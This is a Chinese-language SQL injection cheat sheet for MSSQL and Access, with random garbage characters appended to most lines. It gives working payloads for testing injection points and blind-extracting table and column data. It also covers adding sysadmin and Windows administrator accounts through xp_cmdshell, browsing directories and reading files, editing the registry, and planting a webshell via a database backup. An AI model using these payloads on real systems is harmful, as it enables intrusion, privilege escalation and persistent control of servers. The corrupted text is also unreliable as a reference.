1.判断是否有注入;and 1=1 ;and 1=2 �H,��!3s<1
2.初步判断是否是mssql ;and user>0 V:w=h��>z8
Iv5�agh%�
3.注入参数是字符'and [查询条件] and ''=' hh!�^^emo�
.w�`1;o�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 'h&"xXv4|�
['S��Ze��0
5.判断数据库系统 okO^���/"�
�g0!{��C�W
;and (select count(*) from sysobjects)>0 mssql U��x��q�9H
u~9gR�@e2{
;and (select count(*) from msysobjects)>0 access S>�o�Q���m
noBGP/Av=:
J �c�~{ E
)`�ZTu -|�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 jH��x�g(]
�KF"&9nB�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �q�d�FYf/y
)Nw�IEk>Tf
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��X��Y;c�z
�?�4U|6�|1
9.(1)猜字段的ascii值(access) Gn*v�VZ@`x
"�O�h(&N:U
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �8Jd\2T7�h
tC=`J%Ik��
(2)猜字段的ascii值(mssql) D:gskK+o6M
V.RG�=�TVS
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;@$���B{/Q
�[CU�]fU{$
10.测试权限结构(mssql) ]o�N:MS4�r
�JZ5N�Q)sX
�"�@���JSF
NiwJ$Ah~X�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- #O<�2wMb2<
�s4RqMO5eI
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �DJv;ed%�x
��`�&"-�|�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- :Qg�3B� ';
0"~`U.k~M
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- g��$\Z�-!(
TqM�(I[J7\
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ����R~$�W
=?�}
t�7}#
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :n�:Gr�?��
�k{o�p�,n#
;and 1=(select IS_MEMBER('db_owner'));-- Q]Fm�4���
1%�YjY"j+
L+}q !'8�S
F]�hKi��`@
11.添加mssql和系统的帐户 jrMY]Ea2`�
\@6nRs8b|N
;exec master.dbo.sp_addlogin username;-- `3�G��jj&c
;exec master.dbo.sp_password null,username,password;-- 5Mfs)a4�j.
cC�.=,���n
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- W?a2P6mAh
��H1(Zz�n1
;exec master.dbo.xp_cmdshell 'net user username password ��w !N;�Y0
L�-������-
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �GU��JaeFe
[/}y!;3iXM
;exec master.dbo.xp_cmdshell 'net user username password /add';-- =|l��K�B;
&95i�GL28Q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ?N�ZKu�6��
�*�TpzX
�y
P<�+5S�o0�
vV�.TK_�y�
12.(1)遍历目录 [�Yx�)`�e�
�u.wm;eK[
;create table dirs(paths varchar(100), id int) Gb�C�-6�.~
&�j\�<UP�n
;insert dirs exec master.dbo.xp_dirtree 'c:\' D:�9/�;�9V
bqwQi�>^Cw
;and (select top 1 paths from dirs)>0 SCClD�6k=V
[b:��$s�R;
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ~R��V>V*�l
I*�/?*p/I�
?j^��[���7
]�&za^%q0&
(2)遍历目录 ����a�
�D*
n���R7 usL
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- o#KGEN���d
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 /P~@_�_X�N
sN^3bfi!i�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 yJx{���6��
KgtMr�T5<q
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 s�tD�r�F1{
"� h,<��PF
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 )��P:r�;a'
VJ`�c/EVIt
x.r�OP_�rs
�(R�_#lRaQ
13.mssql中的存储过程 &�T�qY\��l
$]�4>;gTL'
xp_regenumvalues 注册表根键, 子键 &Uh�I1mi]h
@J~�n$^k�e
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 o�2�
=UUD&
=&Q�C&CqEi
xp_regread 根键,子键,键值名 vc.:�d�u��
����-2}-;|
;exec xp_regread ��'-s���Ai
)J?��Nfi%�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ��~�n:dHK`
�Q:I2��\E�
xp_regwrite 根键,子键, 值名, 值类型, 值 {shf\�pm!o
X<\y%2B|�l
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �i5 � x�[1
`T �H0*:aI
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��Wq_#46P-
Y6T�1��_XG
xp_regdeletevalue 根键,子键,值名 f�k%�yi�[�
T�u Q�@b
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 N��=��J�$+
�xjHOrr
OQ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ~7$�E\w�6�
SST1v�zm!
�*M��f�;�
=�VMV^�[&>
14.mssql的backup创建webshell �O�j<.3U[C
��8+no>%�L
use model h_K�(�8�{1
49%qB��O$R
create table cmd(str image); @SREyqC4�
P q\m8iS,w
insert into cmd(str) values (''); Mp:/[%�9Fi
(?S��K< 4!
backup database model to disk='c:\l.asp'; +*�2�wGAT�
o9)pOwk7;�
E DuLg��g@
Si,���[7um
15.mssql内置函数 N zY}�-:{�
G�[4�TT�#�
;and (select @@version)>0 获得Windows的版本号 ��S� Rs~p�
X {,O��P�/
;and user_name()='dbo' 判断当前系统的连接用户是不是sa % AqUV�t9}
@5�n�!t1(
;and (select user_name())>0 爆当前系统的连接用户 Kq�}�/�`P�
�s��hbPy �
;and (select db_name())>0 得到当前连接的数据库 Nz�`4q��%+
AV��0m�31b
nQ�ui�RTU<
�b�#U
nE��
16.简洁的webshell 0be1aY;m�&
8spoDb.S��
use model 2@��``=0z�
I@Vh���xJh
create table cmd(str image); iB[�>uW��
tlw$/�t�Ma
insert into cmd(str) values (''); >
Y
<in��/
`ReTfz�;o
backup database model to disk='g:\wwwtest\l.asp';
